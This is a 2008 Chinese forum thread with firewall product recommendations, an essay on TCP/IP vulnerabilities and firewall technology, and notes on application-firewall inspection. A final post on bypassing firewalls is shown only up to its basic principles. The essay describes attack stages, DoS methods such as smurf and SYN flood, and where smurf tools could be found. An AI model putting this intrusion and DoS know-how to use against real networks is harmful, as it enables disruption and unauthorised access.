Agnitum Outpost Firewall 是一款短小精悍的网络防火墙软件,它的功能是同类PC软件中比较强大的,甚至包括了广告和图片过滤、内容过滤、DNS缓存等功能 。它能够预防来自Cookies、广告、电子邮件病毒、后门、窃密软件、解密高手、广告软件和其它 Internet 危险的威胁。该软件不需配置就可使用,这对于许多新手来说,变得很简单。尤为值得一提的是,这是市场上第一个支持插件的防火墙, 这样它的功能可以很容易地进行扩展。该软件资源占用也很小。 Outpost的其它强大功能毋庸多说,你亲自试一试就知道了。

6.XELIOS Personal Firewall(XFW)◆◆

体积小巧,但功能强大的个人网络防火墙软件。能够有效的抵御黑客和木马的攻击,具有强大的自定义 IP 过滤规则功能。

7.LockDown Millennium(LDM)——一般推荐◆◆◆◆

最棒的网络安全工具!能够清除目前所有的木马,能查出未知木马,能杀邮件病毒,能防止网络炸弹攻击,能在线检测所有对本机的访问 并控制它们,能跟踪入侵者,留下它的罪证……简直就是本机防火墙,也许比它还强?

8.Intruder ALART 99——强烈推荐◆◆◆◆◆

LockDown 2000 能防黑客程序, 能防一些常规的攻击如 Ne

tBus, SubSeven... The Cleaner能清除黑客程序并阻止它的运行.但是面对新的黑客软件的现身, 如 冰河... $C (共享 C 盘等自制黑客软件) 等等... 它已经力不从心.Intruder ALART 99就防住任何对你的攻击!

9.The Cleaner◆◆

一个专门检测和清除侵入您系统中的特洛伊木马的专业程序, 内置4789个木马标识。可在线升级版本和病毒数据库, 作简单, 功能强大! 查杀的各类特洛伊木马种类最多,几乎所有较出名的这里都有,如 Netspy、BO、Netbus、 Girlfriend、Happy99、BackDoor 以及它们的一些不同版本。还有很多种我们大多数网友听都没听过,有了它我们可以将电脑“清洁”得干干净净,放心大胆地上网。

10.Kerio Personal Firewall (KFW)——一般推荐◆◆◆◆

Kerio Personal Firewall 采用了专业的防黑技术,可以确保你的计算机不被任何黑客侵扰,资源占用极少,支持 MD5 文件校验,支持远程管理。 对个人用户完全免费,商业用途则是30天试用。

11.Sygate Personal Firewall(SFW)◆◆

Sygate Personal Firewall 是一个简单易用的个人防火墙,适合于那些网络中的单机用户来防止入侵者非法进入系统。作为一个基于主机的解决方案,该软件提供了 多层保护的防火墙安全环境,可以有效地防止入侵者和黑客的侵袭。与真正的防火墙不同的是,Sygate Personal Firewall 能够从系统内部进行保护,并且可以在后台不间断地运行。另外,该软件还提供有安全访问和访问监视功能,并可向你提供所有用户的活 动报告,当检测到入侵和不当的使用后,能够立即发出警报。

12.天网防火墙——强烈推荐!◆◆◆◆◆

天网防火墙个人版是一款由天网安全实验室制作的给个人电脑使用的网络安全程序。它根据系统管理者设定的安全规则把守网络,提供强 大的访问控制、应用选通、信息过滤等功能。它可以帮你抵挡网络入侵和攻击,防止信息泄露,并可与天网安全实验室的网站相配合,根 据可疑的攻击信息,来找到攻击者。

13.瑞友RSA防火墙◆◆

RSA迷你版是由西安瑞友信息技术资讯有限公司所出的Real Secureity & Acceleration Server防火墙的精简体验版,其包含RSA Server的部分精简功能,适合于小型企业、办公、学校、网吧等小型局域网的网络安全和线路共享。

RSA迷你版是取代目前各种代理服务器的最佳选择,她除了具有传统代理服务器的所有功能以外,还是一个集各种网络服务功能为一身 的状态检测防火墙,她让您可以共享一条线路通过代理方式或者NAT地址转换方式,并且集成了DHCP、DNS等网络服务,支持常 见的各种接入方式ADSLISDNModem以太网光纤等。

您还可以将她取代个人防火墙安装在个人PC上起到比个人防火墙强大百倍的效果。保证您的PC机永不受攻击性病毒或者黑客的骚扰。

RSA防火墙还具有以下性能特点:

1. 独一无二的路由加速功能

2. 坚固的防火墙能力

3. 稳定的网关性能

4. 内置DHCP服务,DNS中继

5. 独创的网络安全锁功能

6. 强大的网络抗干扰能力

7. 保证您的局域网私人资料处于安全的状态。

8. 提供网络实时过滤监控功能。

9. 防御各种木马和蠕虫病毒的恶意攻击,如冲击波、振荡波、BO、冰河。

10. 防御ICMP、IGMP洪水攻击、IGMP NUKE攻击及IGMP碎片攻击。

11. 防御诸如WinNuke、IpHacker之类的OOB攻击。

软件安装使用简单,设置选项明了,采用独特的界面设计,豪华与朴实相结合,个性化的选择,给您以美的享受。是应用于小型局域网共 享和安全防护的最佳选择!

14.反黑精英(Trojan Ender)——一般推荐◆◆◆◆

反黑精英( 原名 Trojan Ender ) 推出短短不到二个月即受到广大用户的好评!木马、QQ盗号软件、传奇盗号软件等各种黑客程序的真正克星!查杀速度最快,准确率最 高,杀除最细致! 各种辅助工具使用简单而功能强大!

查杀速度又获大幅提升!新增分析扫描功能,可查未知木马!木马、QQ盗号软件、传奇盗号软件等各种黑客程序一杀无遗!查杀全面准 确,速度超快,使用简单方便,运行稳定,界面美观!可自动修复被破坏的注册表键值!支持对压缩文件的扫描,并可轻松查杀捆绑式木 马、无进程木马!系统优化器提高您的系统运行效率!IE修复器轻松修复恶意网页的破坏!

15.诺顿网络安全特警(中文版)——强烈推荐◆◆◆◆◆

诺顿网络安全特警2004 简体中文零售版,10月21日发布,无缝集成防病毒、个人防火

墙、隐私控制、反垃圾邮件、父母控制等功能,可以确保您收发电子邮 件,网上购物,在线理财安全无忧。安装本软件之前请先卸载旧版本。支持自安装日起一年内在线升级。

诺顿网络安全特警2004以其全面的防护功能,高度的集成性和易用性荣获了个人电脑杂志编辑选择奖。它不仅可以防御病毒,还新增 了对间谍程序,击键记录程序等非病毒性威胁的防护,保护您的密码等隐私信息不会被泄露出去;防火墙功能考虑到笔记本电脑用户经常 变换网络的情况,可以根据不同的网络自动切换网络安全配置,使移动用户不会因为忘记改变安全配置而产生安全隐患;反垃圾邮件功能 通过多种垃圾邮件过滤机制能够使您基本摆垃圾邮件的侵扰;父母控制功能可以为每个家庭成员设置不同的网络使用权限,并且禁止某 些未成年人不宜的网上内容和网站,为您的家庭提供一个健康愉快的网络环境;总之,诺顿网络安全特警2004为个人用户提供了功能 全面

诺顿网络安全特警2004升级服务包括对下列内容的实时更新:病毒定义、病毒扫描引擎、防火墙规则、入侵检测特征、最新发现系统 漏洞、垃圾邮件定义、内容过滤信息。

警告:如牵涉到版权请试用后24小时内删除,如满意请付费作者继续使用。

16.PestPatrol Corporate Edition◆◆◆

最好的企业电脑预防保护软件,全面预防来自黑客工具的威胁,特洛伊木马、键盘监视工具,拒绝代理服务器攻击;全面检查所有文件或 指定文件;扫描内存并清除病毒;检查并移动在注册表和运行的病毒;自动防止spyware进入电脑;详细的日志;隔离和删除确定 病毒;支持在线升级;全面兼容其它杀毒软件防火墙。该版本在以前版本的基础上添加了一个连接、搜索标签,可以直接跟踪流行的恶意 软件信息发布网页。

17.F-Secure——强烈推荐!◆◆◆◆◆

欧洲最好的防火墙,在2003年底,F-SECURE被评为2003 TOP TEN排名第一。该防火墙的特点是利用系统资源少,对系统作没有任何影响.如果你还在用什么金山什么NORTON,KV,或者 迈开非,我建议你现在就可以删除了.在欧洲多数的学校和公司都采用F-SECURE的防火墙。

18.McAfee Desktop Firewall——一般推荐◆◆◆◆

能够对客户端进行前瞻性的保护和控制,使其免受新威胁的攻击,这是单纯的防病毒产品无法实现的。 Desktop Firewall 针对网络和应用程序提供了全面的防火墙功能,并与入侵检测技术完美结合。 它可以防止客户端发送或接收非法网络流或应用程序中所携带的恶意攻击。 它还可以防止合法应用程序被入侵者利用,进而在整个网络中发送或接收攻击信息。 McAfee ePolicy Orchestrator 为 Desktop Firewall 提供了可扩展的集中式管理、部署和报告功能。 此外,Desktop Firewall 能够与 McAfee VirusScan Enterprise 和 ePolicy Orchestrator 进行集成,从而提供了无可比拟的客户端安全性和投资回报率。

19.Tiny Personal Firewall◆◆

这是一个全面,却又简单易用的网络防黑软件,可以管理本机与网络的数据交换,通过设置不同的安全规则,阻挡任何未经认证的用户进 入你的计算机,可以防止特洛依木马、间谍软件、网络蠕虫通过计算机窃取发送数据,支持MD5签名认证,这样可以防止trojan 使用计算机认可的应用程序来闯入计算机,还可以和不同的VPN技术如Cisco、Alcatel、Nortel整合一起。

20.瑞星防火墙——强烈推荐!◆◆◆◆◆

1、保护网络安全,免受黑客攻击。

2、采用增强型指纹技术,有效的监控网络连接。

3、内置细化的规则设置,使网络保护更加智能。

4、游戏防盗、应用程序保护等高级功能,为个人电脑提供全面安全保护。

5、通过过滤不安全的网络访问服务,极大地提高了用户电脑的上网安全。

6、彻底阻挡黑客攻击、木马程序等网络危险,保护上网帐号、QQ密码、网游帐号等信息不被窃取。
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 6 发表于: 2008-03-25 10:45:17
TCP/IP网络的信息安全与防火墙技术

自从INTERNET进入我们的生活,到目前为止,它的影响已几乎可达全世界每个角落,真正从信息意义上形成了世界范围的地球村。我国近十年来的INTERNET用户数与带宽均以惊人的速度增长,根据CNNIC在2000年7月份的最新统计,中国网民数量已经达到1690万,相比较于同年1月份的890万,在短短的半年内,网民数量增长了一倍;2000年7月,国内注册的各类域名达到99734个,比同年1月的48695个也增长了一倍。2000年1月的统计数字表明,我国国际线路的总带宽达到35lMbps,而2000年7月,这一数字已经达到1234Mbps,预计2001年将达到3.3Gbps。但是随之而来的是与之相伴随的很多困扰我们的因素,比如IP地址的短缺、垃圾信息的泛滥、对传统伦理观念的影响,尤其是由于当前网络协议TCP/IP所固有的缺陷所造成的安全问题。
网络上的信息安全可以大致分为三个部分:系统信息安全、传播信息安全及信息内容的安全。网络上系统信息的安全包括用户口令鉴别、用户存取权限控制、数据存取权限、方式控制、安全审计、安全问题跟踪、计算机病毒防治、数据加密等等; 网络上信息的传播安全侧重于防止和控制非法、有害的信息进行传播后的后果、避免公用网络上大量自由传输的信息失控; 网络上信息内容的安全则侧重于保护信息的保密性、真实性和完整性,避免攻击者利用系统的安全漏洞进行窃听、冒充、诈骗等有损于合法用户的行为,其本质上是保护用户的利益和隐私。
由于TCP/IP协议自身在安全上的脆弱性,事实上,当前INTERNET上的信息无论系统信息、还是内容信息,都具有不安全因素,比如大量的网站被黑、用户个人帐号、银行帐号被盗用、国防机密档案失窃等等,说明网络的不安全因素它已经严重影响到它自身的发展。去年被媒体爆炒的电子商务终于受到冷落的重要原因之一即是:如何保证网上交易信息的安全?
一 TCP/IP网络的脆弱性
目前使用最广泛的网络协议是TCP/IP协议,TCP/IP最初是在美国国防高级研究项目局(DARPA)的赞助下开发的,并成功应用于APPANET上,开发它的初衷当然是军事目的,但军方后来公开了TCP/IP的核心技术,由于该技术简洁而良好的开放性,终于使它成为网际互联的基础,最终形成了今天的INTERNET。
1 TCP/IP协议存在安全漏洞
而TCP/IP的简洁与开放恰恰就意味着它在安全上存在隐患,如在IP层的IP地址可以软件设置,这就造成了地址假冒和地址欺骗两类安全隐患;IP协议支持源路由方式,即源点可以指定信息包传送到目的节点的中间路由,这就提供了源路由攻击的条件;TCP层的三次连接握手事实上也是SYN FLOODING拒绝服务的基础;其它应用层协议Telnet、FTP、SMTP等协议缺乏强有力的认证和保密措施,黑客极可能籍此造成否认、拒绝等欺瞒行为的攻击。
TCP/IP网络的开放性可以给予黑客更多的机会,但在这里需要说明的是,最终的安全问题会集中到网络服务器的操作系统上去,黑客利用TCP/IP找到了目标,最终的信息失窃和操作系统的漏洞有关,黑客们一般是利用OS的漏洞来掌握远程主机权限从而达到窃取或破坏目的。
当然,我们不可能不注意到的是网络传输中信息内容,TCP/IP协议不包含加密层,那么一旦用户捕获到网络数据后再根据协议分层分析,有可能得到大量机密信息。比如说,局域网内可能就是纯文本的信息流,通常的电子邮件也是不加密的,更糟的是,在缺省模式中电子邮件客户端用来与其电子邮件服务器进行核查的用户名与口令也是以纯文本形式发出的,可能被截获或假冒。
2 基于TCP/IP网络进行攻击的手段
一般情况下,攻击大体有如下三个步骤: 即信息收集→对系统的安全弱点探测与分析→实施攻击。
1) 信息收集
信息收集的目的是为了进入所要攻击的目标网络的数据库。黑客会利用下列的公开协议或工具,收集驻留在网络系统中的各个主机系统的相关信息。 ● SNMP协议。用来查阅网络系统路由器的路由表,从而了解目标主机所在网络的拓扑结构及其内部细节。
● TraceRoute程序。能够用该程序获得到达目标主机所要经过的网络数和路由器数。
● Whois协议。该协议的服务信息能提供所有有关DNS域和相关的管理参数。
● DNS服务器。该服务器提供了系统中可以访问的主机的IP地址表和它们所对应的主机名。
● Finger协议。可以用Finger来获取一个指定主机上的所有用户的详细信息(如用户注册名、电话号码、最后注册时间以及他们有没有读邮件等等)。
● Ping实用程序。可以用来确定一个指定的主机的位置。
● 自动Wardialing软件。可以向目标站点一次连续拨出大批电话号码,直至遇到某一正确的号码使其MODEM响应。
2) 系统安全弱点的探测
在收集到攻击目标的一批网络信息之后,黑客会探测网络上的每台主机,以寻求该系统的安全漏洞或安全弱点,黑客可能使用下列方式自动扫描驻留网络上的主机。
● 自编程序 对某些产品或者系统,已经发现了一些安全漏洞,该产品或系统的厂商或组织会提供一些“补丁”程序给予弥补。但是用户并不一定及时使用这些“补丁”程序。黑客发现这些“补丁”程序的接口后会自己编写程序,通过该接口进入目标系统,这时该目标系统对于黑客来讲就变得一览无余了。
● 利用公开的工具象INTERNET的电子安全扫描程序IIS(INTERNET Security Scanner)、审计网络用的安全分析工具SATAN(Security Analysis Toolfor Auditing Network)等这样的工具,可以对整个网络或子网进行扫描,寻找安全漏洞。这些工具有两面性,就看是什么人在使用它们。系统管理员可以使用它们,以帮助发现其管理的网络系统内部隐藏的安全漏洞,从而确定系统中那些主机需要用“补丁”程序去堵塞漏洞。而黑客也可以利用这些工具,收集目标系统的信息,获取攻击目标系统的非法访问权。
3) 网络攻击
黑客使用上述方法,收集或探测到一些“有用”信息之后,就可能会对目标系统实施攻击。黑客一旦获得了对攻击的目标系统的访问权后,又可能有下述多种选择:
● 该黑客可能试图毁掉攻击入侵的痕迹,并在受到损害的系统上建立另外的新的安全漏洞或后门,以便在先前的攻击点被发现之后,继续访问这个系统。
● 该黑客可能在目标系统中安装探测器软件,包括特洛伊木马程序,用来窥探所在系统的活动,收集黑客感兴趣的一切信息,如Telnet和FTP的帐号名和口令等等。
● 黑客可能进一步发现受损系统在网络中的信任等级,这样黑客就可以通过该系统信任级展开对整个系统的攻击。
● 如果该黑客在这台受损系统上获得了特许访问权,那么它就可以读取邮件,搜索和盗窃私人文件,毁坏重要数据,破坏整个系统的信息,造成不堪设想的后果。
3 拒绝服务攻击
和上述的系统信息隐患所不同的是,INTERNET上还存在这一类恶意攻击,称之为拒绝服务攻击(Dos),这种攻击所造成的后果,虽不同于信息失窃,但会造成网络严重瘫痪,无法提供正常的服务。
DoS的攻击方式有很多种。最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,致使服务超载,无法响应其他的请求。这些服务资源包括网络带宽、文件系统空间容量、开放的进程或者向内的连接等等。这种攻击会导致资源的匮乏,多数的DoS攻击需要相当大的带宽的,恶意的攻击者为了利用较小的个人带宽去消耗大量的带宽而开发了分布式的攻击,他们可以利用工具集合许多的网络带宽来对同一个目标发送大量的请求。
较为常见的基于网络的拒绝服务攻击有:
● Smurf (directed broadcast) 这是基于ICMP的拒绝服务攻击,ICMP是一个在主机和网关之间消息控制和差错报告协议,IP并非设计为绝对可靠,这个协议的目的是为了当网络出现问题的时候返回控制信息,它并不保证数据报或控制信息能够返回,一些数据报仍将在没有任何报告的情况下丢失。上层协议必须使用自己的差错控制程序来判断通信是否正确,ICMP信息通常会报告在处理数据报过程中的错误。当网络中的某台机器使用广播地址发送一个ICMP echo请求包时(例如PING),处于该广播网段的主机均会回应一个ICMP echo回应包,也就是说,发送一个包会收到许多的响应包。Smurf攻击就是使用这个原理来进行的,如果在网络中发送源地址为被攻击主机的地址、目的地址为广播地址的包,被攻击主机就会被这些大量的回应所淹没(因为他的地址被攻击者假冒了)。这些smurf工具可以在www.netscan.org网站上获得,许多网站至今仍有很多的这种漏洞。 ● SYN flooding 在TCP层的标准的TCP握手需要三次包交换来建立。一台服务器一旦接收到客户机的SYN包后必须回应一个SYN/ACK包,然后等待该客户机回应给它一个ACK包来确认,才真正建立连接。然而,如果此时只发送初始化的SYN包,而不发送确认服务器的ACK包会导致服务器一直等待ACK包。由于服务器在有限的时间内只能响应有限数量的连接,这就会导致服务器一直等待回应而无法响应其他机器进行的连接请求。
● Slashdot effect 这种攻击手法使web服务器或其他类型的服务器由于大量的网络传输而过载,一般这些网络流量是针对某一个页面或一个链接而产生的。当然这种现象也会在访问量较大的网站上正常发生,因为正常情况下一个服务器承受过多的用户服务请求也会同样过载。 ● 分布式攻击 有些程序如Tribe Flood Network (tfn) 和tfn2k,可以使得分散在互连网各处的机器共同完成对一台主机攻击的操作,从而使主机看起来好象是遭到了不同位置的许多主机的攻击。这些分散的机器由几台主控制机操作进行诸如UDP flood, SYN flood攻击。
4 数据传输中的不安全
当然,我们不可能不注意到的是网络传输中信息内容,TCP/IP协议不包含加密层,那么一旦用户捕获到网络数据后再根据协议分层分析,有可能得到大量机密信息。比如说,局域网内可能就是纯文本的信息流,通常入的电子邮件也是不加密的,更糟的是,在缺省模式中电子邮件客户端用来与其电子邮件服务器进行核查的用户名与口令也是以纯文本形式发出的,可能被截获或假冒。
事实上,目前对于局域网(如一段共享式HUB构成的以太网)内部的网络监听工具非常多,著名的有NFSWATCH、NETXRAY等等,这些工具通常很容易在网上得到。现在的问题是:局域网外部的攻击者有什么办法能在局域网内部使用监听工具?而根据通常所假设的内部用户可信原则,却恰恰发生的是内部用户进行了非法的越权监听,怎么办?
二 安全措施与防火墙
INTERNET上丰富的资源吸引了越来越多的用户,通常的用户都是这些资源的受益者,但我们还是会意识到网络上的巨大安全风险,至少下列用户与普通的个人用户所需要的安全级别是不一样的:
● 军事机关
● 政府部门
● 教育、科研机构
● 金融、财税、电信等具有专门的行业性质数据处理业务的部门
● 电子商务
● 各类ISP、ICP
● 企业intranet
特殊的部门信息网络可能会自成一体,但大多数情况下,即使存在安全风险,用户也会以极大的热情接入INTERNET,在这种情况下,用户采取必要的安全措施尤为重要。而在这个时候,如何既能保证享用INTERNET上的丰富资源,又能保证自身的安全呢?用户至少有两种选择:主动的入侵检测防范与较为被动的防火墙设置,其中,防火墙几乎是一个必然的选择。
根据ICSA入侵检测系统论坛的定义,入侵检测是通过从计算机网络或计算机系统中的若干关键点收集信息并对其进行分析,从中发现网络或系统中是否有违反安全策略的行为和遭到袭击的迹象(的一种安全技术)。入侵检测技术是动态安全技术的最核心技术之一。通常的入侵检测包含动态的对下列情况进行检查:系统进程 、查网络连接和端口 、系统日志、是否被进行大量的端口扫描、帐号扫描、以及与OS直接相关的一些进程、文件的可疑变动情况,通常包含基于网络的入侵检测系统和基于主机的入侵检测系统。入侵检测技术的特点就是主动性与动态性。用户一旦发现危险的入侵,可以采取相应的措施来保护自身的安全。 理想的情况是:用户可以籍此发现攻击者或利用防火墙切断与之的连接。
防火墙通常被定义为:设置在可信任的内部网络和不可信任的外界之间的一道屏障,它可以实施比较广泛的安全政策来控制信息流,防止不可预料的潜在的入侵破坏。
通常防火墙具有以下特点:
● 从内部到外部或从外部到内部的所有通信都必须通过防火墙
● 只有符合本地安全策略的通信才会被允许通过
● 防火墙本身是免疫的,不会被穿透的
理想的防火墙应该是能过滤一切来自外部的不安全因素,防止危险的入侵活动。它可以与入侵检测系统一起维护系统的安全,也可以通过自身的良好的安全配置,简单、高效地完成大多数场合安全防护。
三 防火墙技术现状
防火墙是一套完整的(软、硬件)系统,它可以从TCP/IP的各个层次中提取、存储、记录并管理相关的信息,以便实施系统的访问安全决策控制。 防火墙的实现技术目前主要包含两大类:包过滤技术和应用代理技术,事实上,实际的产品中往往是二者的良好结合。
1 包过滤技术
包过滤技术是最早的防火墙应用技术,发展到现在,它已经从早期的静态包过滤演进到了现在的动态包过滤技术。 1) 静态包过滤
静态包过滤技术的实现非常简单,就是在网关主机的TCP/IP协议栈的IP层增加一个过滤检查,对IP包的进栈、转发、出栈时均进行针对于每个包的源地址、目的地址、端口、应用协议进行检查,用户可以设立安全策略,比如某某源地址禁止对外部的访问、禁止对外部的某些目标地址的访问、关闭一些危险的端口等等,事实证明,一些简单而有效的安全策略可以极大的提高内部系统的安全,由于静态包过滤规则的简单、高效,直至目前,它仍然得到应用。
2) 动态包过滤技术
动态包过滤(Dynamic Packet Filter)技术除了含有静态包过滤的过滤检查技术之外,还会动态的检查每一个有效连接的状态,所以通常也称为状态包过滤(Stateful Packet Filters)技术。
状态包过滤(SPFs)克服了第一代包过滤(静态包过滤)技术的不足,如信息分析只基于头信息、过滤规则的不足可能会导致安全漏洞、对于大型网络的管理能力不足等等。
SPFs对于包处理的规则是动态的,采用SPFs技术的防火墙正如在安全网络上加了一道动态的门,即使是对于同一个服务端口,它也可能根据状态检测结果适时的打开或关闭。它监视每一个有效连接的状态,并把当前数据包及其状态信息与前一时刻的数据包及状态信息进行比较,即经过一系列严密的算法分析,根据分析结果实施相应的操作,如允许数据包通过、拒绝通过、认证连接、加密数据等。 SPFs技术不仅支持TCP,同时也支持UDP等无连接的应用,SPFs防火墙对基于UDP应用安全的实现是通过在UDP通信之上保持一个虚拟连接来实现的。防火墙保存通过网关的每一个连接的状态信息,允许通过防火墙的UDP请求包被记录。当UDP包在相反方向上通过时,防火墙依据连接状态表确定该UDP包是否被授权,若已被授权,则通过,否则拒绝。如果在指定的一段时间内响应数据包没有到达,即连接超时,则该连接被阻塞。采取这种原理可以阻塞所有的攻击,从而实现UDP应用的安全性。
在Check Point公司的产品中,SPFs技术被称之为Stateful Inspection,其核心技术已取得专利并被植入OS内核,其工作模块位于数据链路层和网络层之间,保证了防火墙对于原始数据包的截取和检查,事实上,Check Point 公司的产品也混合使用了应用代理服务,Fore公司甚至直接购买Stateful Inspection的专利形成ASIC芯片直接植入其高端交换机设备中,NetGuard产品也采用了类似的技术。
2 应用代理技术
应用代理防火墙(有时也称为应用网关)的工作方式和以包过滤技术为主的防火墙的工作方式稍有不同。它是基于软件的;当某远程用户想和一个运行应用网关的网络建立联系时,此应用网关会阻塞这个远程联接,然后对联接请求的各个域(包括应用层协议、用户帐号等等)进行检查。如果此联接请求符合预定的规则,应用代理网关即可向外部发出连接请求、建立连接,而同时内部主机仅仅是与网关主机有着连接,也就是说,应用代理网关此时充当了访问的中介。一个典型的应用代理网关不将IP数据报转发给内部网络,而是自己作为转换器和解释器完成整个访问过程。
应用级代理防火墙模式提供了十分先进的安全控制。因为它通过在协议栈的最高层检查每一个东西而提供了足够的应用级连接的信息。因为在应用层中它有足够的能见度,应用级代理防火墙能很容易看见前面提及的每一个连接的细节从而实现安全策略。例如这种防火墙能很容易运用适当的策略区分重要的应用程序命令,象ftp的“put”和“get”。这种方式被称之为man-in-the-middle configuration。
应用级代理防火墙也具有内建代理功能的特性,即在防火墙处终止客户连接并初始化一个新的连接到受保护的内部网络。这一内建代理机制提供额外的安全,这是因为它将内部和外部系统隔离开来,使系统外部的黑客在防火墙内部系统上进行探测变得更困难。同时一般它们都有完整的系统日志。 然而所有的这些优点都是通过牺牲速度换取的,因为每次联接请求和所有发往内部网的报文在网关上经历接受、分析、转换和再转发等几个过程,完成这些过程所需时间显然比包过滤防火墙的时间长得多。应用网关另一个不足之处是,必须为每个网络服务创建一个应用代理。
3 防火墙领域的前沿技术
1) 自适应的代理服务防火墙
“自适应代理”是最近一代防火墙设计。基本安全检测仍在安全应用层进行,但一旦安全检测后包能重新直接通过网络层,则能够动态“适应”传送中的分组流量,从而明显改善了防火墙性能。因此自适应防火墙基本上和标准代理服务防火墙一样安全,但是却显著的提高了它的速度。
2) 桥式接口防火墙
通常的包过滤过程通常在TCP/IP协议栈的IP层,而交换式接口防火墙对于数据包的截取却是在数据链路层,它利用在链路层截取到的包直接分析其IP层信息,从而进行相应的信息安全检查,合法的包再根据其链路层地址进行端口转发。
这种防火墙在许多场合极具优势,如管理简单、客户端设置无须变更、处理速度快等等,目前国外与国内均有此类产品。
3) 混合型防火墙
事实上,现在的防火墙产品大多是集成包过滤以及应用代理技术为一体,用户在使用时,可以有多种选择,以提高其安全性。 当然,混合型防火墙不仅包含了多种防火墙技术,它也可能包含了其它与信息安全直接相关的技术,如VPN、入侵检测等等。
但是,无论拥有什么先进的安全技术与产品,我们都不能认为自己的系统是绝对安全的,网络攻击与安全防范永远是一对矛盾,它最终会导致现有整个网络体系的完善与进步
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 7 发表于: 2008-03-25 10:45:45
防火墙封阻应用攻击的八项技术

深度数据包处理

  深度数据包处理有时被称为深度数据包检测或者语义检测,它就是把多个数据包关联到一个数据流当中,在寻找攻击异常行为的同时,保持整个数据流的状态。深度数据包处理要求以极高的速度分析、检测及重新组装应用流量,以避免给应用带来时延。下面每一种技术代表深度数据包处理的不同级别。

  TCP/IP终止

  应用层攻击涉及多种数据包,并且常常涉及多种请求,即不同的数据流。流量分析系统要发挥功效,就必须在用户与应用保持互动的整个会话期间,能够检测数据包和请求,以寻找攻击行为。至少,这需要能够终止传输层协议,并且在整个数据流而不是仅仅在单个数据包中寻找恶意模式。

  SSL终止

  如今,几乎所有的安全应用都使用HTTPS确保通信的保密性。然而,SSL数据流采用了端到端加密,因而对被动探测器如入侵检测系统(IDS)产品来说是不透明的。为了阻止恶意流量,应用防火墙必须终止SSL,对数据流进行解码,以便检查明文格式的流量。这是保护应用流量的最起码要求。如果你的安全策略不允许敏感信息在未加密的前提下通过网络传输,你就需要在流量发送到Web服务器之前重新进行加密的解决方案。

  URL过滤

  一旦应用流量呈明文格式,就必须检测HTTP请求的URL部分,寻找恶意攻击的迹象,譬如可疑的统一代码编码(unicode encoding)。对URL过滤采用基于特征的方案,仅仅寻找匹配定期更新的特征、过滤掉与已知攻击如红色代码和尼姆达有关的URL,这是远远不够的。这就需要一种方案不仅能检查RUL,还能检查请求的其余部分。其实,如果把应用响应考虑进来,可以大大提高检测攻击的准确性。虽然URL过滤是一项重要的操作,可以阻止通常的脚本少年类型的攻击,但无力抵御大部分的应用层漏洞。

请求分析

  全面的请求分析技术比单单采用URL过滤来得有效,可以防止Web服务器层的跨站脚本执行(cross-site scripting)漏洞和其它漏洞。全面的请求分析使URL过滤更进了一步:可以确保请求符合要求、遵守标准的HTTP规范,同时确保单个的请求部分在合理的大小限制范围之内。这项技术对防止缓冲器溢出攻击非常有效。然而,请求分析仍是一项无状态技术。它只能检测当前请求。正如我们所知道的那样,记住以前的行为能够获得极有意义的分析,同时获得更深层的保护。

  用户会话跟踪

  更先进的下一个技术就是用户会话跟踪。这是应用流量状态检测技术的最基本部分:跟踪用户会话,把单个用户的行为关联起来。这项功能通常借助于通过URL重写(URL rewriting)来使用会话信息块加以实现。只要跟踪单个用户的请求,就能够对信息块实行极其严格的检查。这样就能有效防御会话劫持(session-hijacking)及信息块中毒(cookie-poisoning)类型的漏洞。有效的会话跟踪不仅能够跟踪应用防火墙创建的信息块,还能对应用生成的信息块进行数字签名,以保护这些信息块不被人篡改。这需要能够跟踪每个请求的响应,并从中提取信息块信息。

  响应模式匹配

  响应模式匹配为应用提供了更全面的保护:它不仅检查提交至Web服务器的请求,还检查Web服务器生成的响应。它能极其有效地防止网站受毁损,或者更确切地说,防止已毁损网站被浏览。对响应里面的模式进行匹配相当于在请求端对URL进行过滤。响应模式匹配分三个级别。防毁损工作由应用防火墙来进行,它对站点上的静态内容进行数字签名。如果发现内容离开Web服务器后出现了改动,防火墙就会用原始内容取代已毁损页面。至于对付敏感信息泄露方面,应用防火墙会监控响应,寻找可能表明服务器有问题的模式,譬如一长串Java异常符。如果发现这类模式,防火墙就会把它们从响应当中剔除,或者干脆封阻响应。

  采用“停走”字(‘stop and go’word)的方案会寻找必须出现或不得出现在应用生成的响应里面的预定义通用模式。譬如说,可以要求应用提供的每个页面都要有版权声明。

  行为建模

  行为建模有时称为积极的安全模型或“白名单”(white list)安全,它是唯一能够防御最棘手的应用漏洞——零时间漏洞的保护机制。零时间漏洞是指未写入文档或“还不知道”的攻击。对付这类攻击的唯一机制就是只允许已知是良好行为的行为,其它行为一律禁止。这项技术要求对应用行为进行建模,这反过来就要求全面分析提交至应用的每个请求的每次响应,目的在于识别页面上的行为元素,譬如表单域、按钮和超文本链接。这种级别的分析可以发现恶意表单域及隐藏表单域操纵类型的漏洞,同时对允许用户访问的URL实行极其严格的监控。行为建模是唯一能够有效对付全部16种应用漏洞的技术。行为建模是一种很好的概念,但其功效往往受到自身严格性的限制。某些情况譬如大量使用JavaScript或者应用故意偏离行为模型都会导致行为建模犯错,从而引发误报,拒绝合理用户访问应用。行为建模要发挥作用,就需要一定程度的人为干预,以提高安全模型的准确性。行为自动预测又叫规则自动生成或应用学习,严格说来不是流量检测技术,而是一种元检测(meta-inspection)技术,它能够分析流量、建立行为模型,并且借助于各种关联技术生成应用于行为模型的一套规则,以提高精确度。行为建模的优点在于短时间学习应用之后能够自动配置。保护端口80是安全人员面临的最重大也是最重要的挑战之一。所幸的是,如今已出现了解决这一问题的创新方案,而且在不断完善。如果在分层安全基础设施里面集成了能够封阻16类应用漏洞的应用防火墙,你就可以解决应用安全这一难题
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 8 发表于: 2008-03-25 10:46:16
如何突破各种防火墙的防护

现在随着人们的安全意识加强,防火墙一般都被公司企业采用来保障网络的安全,一般的攻击者在有防火墙的情况下,一般是很难入侵的。下面谈谈有防火墙环境下的攻击和检测。

一 防火墙基本原理

首先,我们需要了解一些基本的防火墙实现原理。防火墙目前主要分包过滤,和状态检测的包过滤,应用层代理防火墙。但是他们的基本实现都是类似的。

│ │---路由器-----网卡│防火墙│网卡│----------内部网络│ │

防火墙一般有两个以上的网络卡,一个连到外部(router),另一个是连到内部网络。当打开主机网络转发功能时,两个网卡间的网络通讯能直接通过。当有防火墙时,他好比插在网卡之间,对所有的网络通讯进行控制。

